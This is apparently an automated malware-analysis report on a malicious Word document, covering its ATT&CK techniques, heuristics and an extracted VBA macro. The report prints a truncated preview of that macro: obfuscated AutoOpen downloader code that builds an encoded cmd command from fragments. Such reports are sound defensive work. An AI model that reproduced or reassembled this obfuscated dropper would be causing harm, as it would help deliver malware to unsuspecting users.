MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call and constructs a command string that appears to be intended for downloading and executing a secondary payload. The ClamAV detection name 'Doc.Downloader.Valyria-6665579-0' further supports its role as a downloader.
Heuristics 7
-
ClamAV: Doc.Downloader.Valyria-6665579-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6665579-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10426 bytes |
SHA-256: cb9dc38e2e2210b4dbcd45e1aeb6ed0cb13d626ab2cf746cd4a952a7b985584f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zUQMzSM" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "jzmcwrCrEjpMa" Function RBffoAm() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error ilakS * zHHlYS sqHOSXm = "md" + " /v: " + "/c" + Chr(0 + 4 + 5 + 4 + 21) + "sET" + " ^ " + "^" + " n^" + "E^wc=" + "==A^Ag" + "^A^A" + "I^AACAg" + "^A^A" Error DKCwY / DhoMD / OEtKDi / BJOWzX MdsKdTjifG = "IA^" + "ACAg" + "A^AIA" + "^ACAg^A" + "^A" + "IAAC^A^" + "gAA^I^A" + "ACA" + "^gA^AIA" + "0" + "H^A" Error 28475 * jDNbUj Error YXWKNZ * Altcu * FwQALq / odKPD Error OzMqMp / 43917 / uJUiV * ajiLP Error 85303 / UaVYnK / 55862 * UiXFc Error 68880 * poFYRj Error 47342 / tscVpR * 67612 * iNwiDl rHLtFSjm = "9Bw^eA" + "g^G^A^j" + "^B^A^" + "d^A^" + "E^G" + "^A^j^B" + "Qf^As" + "D^Ar^B" Error HHPfv * ZDPFF Error OWulv * 88854 SBGzTj = "QY^A^" + "U^GA^y^" + "BgYA" + "^" + "s^D^A^M" + "^BQ" + "^W^AQG" + "^AkA^A" + "I^A0^G" + "Al" Error 14178 * jVsOtj YFYmVKhGRFM = "BAdA^k^" + "E" + "AtA^Q^" + "ZA^sGA" + "v^Bg" + "d^A4" + "G^" Error EhCMPq * WKbvK / 92414 / WGqNP Error 94383 * pipwb PGGdhT = "A" + "^J^Bw^" + "O" + "A" + "kC^AM^" + "BQ^WAQ^" + "G^A^" + "k^A^A^I" + "^AwC^AN" + "B" + "^w^dAE" + "E^AkAA" + "^K^A" Error iEIcBJ * cziLr Error 5899 / zszkJ Error jCTSF / 11456 * jHnKc / UFTRf bjrcMjKwt = "^U" + "^G^AsB^" + "Q" + "a^AYE^" + "AkB" Error 92356 / aoTbtq * vnsjY / SfzTFa Error jwwbp * zMrtO * 68975 / XSHlA Error kAchu / acmbR * jZGCf / WKrvji Error 90100 / 35150 Error 38963 * ATPCB mjYXv = "^QY^A" + "8^G^A^" + "sB^g" + "^bAcHA" + "v^B^A" + "R^A" + "4" + "C" + "A" + "1^B^AWA" + "k" Error Mnvnws * JfhPFp Error 48987 / obaPrP Error 64034 * XBwnZ Error 46067 * 75224 / 68473 * UzCZU Error mlsTz * iioMdW Error 25570 * zYoGvi * oUutb * ifKlJI bpOnmqq = "E^AkA" + "w" + "e^A" + "k" + "HAy" + "B^" + "A^dAsH^" + "A^pA" + "gd^AY^" + "H^AyB^A" + "^JAAC^A" Error QOiSXk * MCzGU / OvbQf * SmFqiW Error OXUdk / FGICKt / 20999 * zofBu Error 46977 * 44445 Error FNHEI / PpAPdK QwSawGdiU = "^uB^Qa^" + "A" + "^ACAN^B" + "^w" + "dA^E^EA" + "^" + "k^" Error 52987 / 23631 / 70674 / 67701 Error WcEIQ / AVZIG Error jzZdNW / XvHtu * 66134 / 71888 Error 95292 * UHLYz TKPKdX = "A" + "A^K^Ag^" + "GAj^BQ^" + "YA^UG^A" + "yBw" + "^b^A^Y^" + "GA7Aw^" + "JAU^G" Error 25317 / RqNOL * 80349 * imVXw Error aJPVNo / YjCoa hckDmREpWt = "^A" + "^" + "4^B^Q" + "Z^A^4CA" + "n^A^w" + "^KA^wE" + "A^J^" + "B^wUA^Q" + "C^A" + "r" Error 9074 / zqFhj / MXtJzv * UqwnI WTkMmS = "A^w^" + "JAwFAn" + "^A" + "^w^K^A^" + "MGA^p^B" + "^A^b" + "^" + "A^I^" + "GA^1^" + "BAcA^o" + "DA^" + "2^B^g^" + "b^A" RBffoAm = sqHOSXm + MdsKdTjifG + rHLtFSjm + SBGzTj + YFYmVKhGRFM + PGGdhT + bjrcMjKwt + mjYXv + bpOnmqq + QwSawGdiU + TKPKdX + hckDmREpWt + WTkMmS Error 3449 * MbSiaL Error mXDVEO * BLhDH * TQiHnH * WoBbTI Error 85187 / VASfdA * qCVclp / Jjimiq End Function Function MRDNTVEYbNS() On Error Resume Next On Error Resume Next On Error Resume Next On Error Resume Next Error 26946 / NFRZkS Error 13064 / 50736 ThWKoZszc = "^UG^" + "A" + "k^AQP^A" + "^" + "w" + "E" + "^A^ZB" + "A^Z^A" + "QCA" + "7^A" + "^wJ^A" + "^" + "MDAyAQ" Error rpRYA / dCtth * 80804 * lVsKY Error ssuNPI * iFONmc Error 24701 * 86507 * wcapB * sJLJIZ Error 89432 / 30238 / KnXnER * wVbCv owZQl = "MAcCAgA" + "^QP^A^A" + "C^" + "A^" + "M^BQ" + "^S" Error fzkdUX / bOOOs * 66747 * LSZkD Error NczKwh / iujcAw Error 55869 / wHTro * LAmKjh / histA PYXkRNfN = "AMF^A" + "kA" + "wO^" + "A^" + "kCAnAAQ" + "A" + "cCA^oAA" Error XpjtU / lrkkNv Error mIzcE / TzRKW * 53795 * jdBFdi Error 43110 / XRljlX * rwQWMS / wWwRU zTmzDpc = "d^A" + "kG^A^sB" + "Ac^AM^F" + "^A^" + "uA^w ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.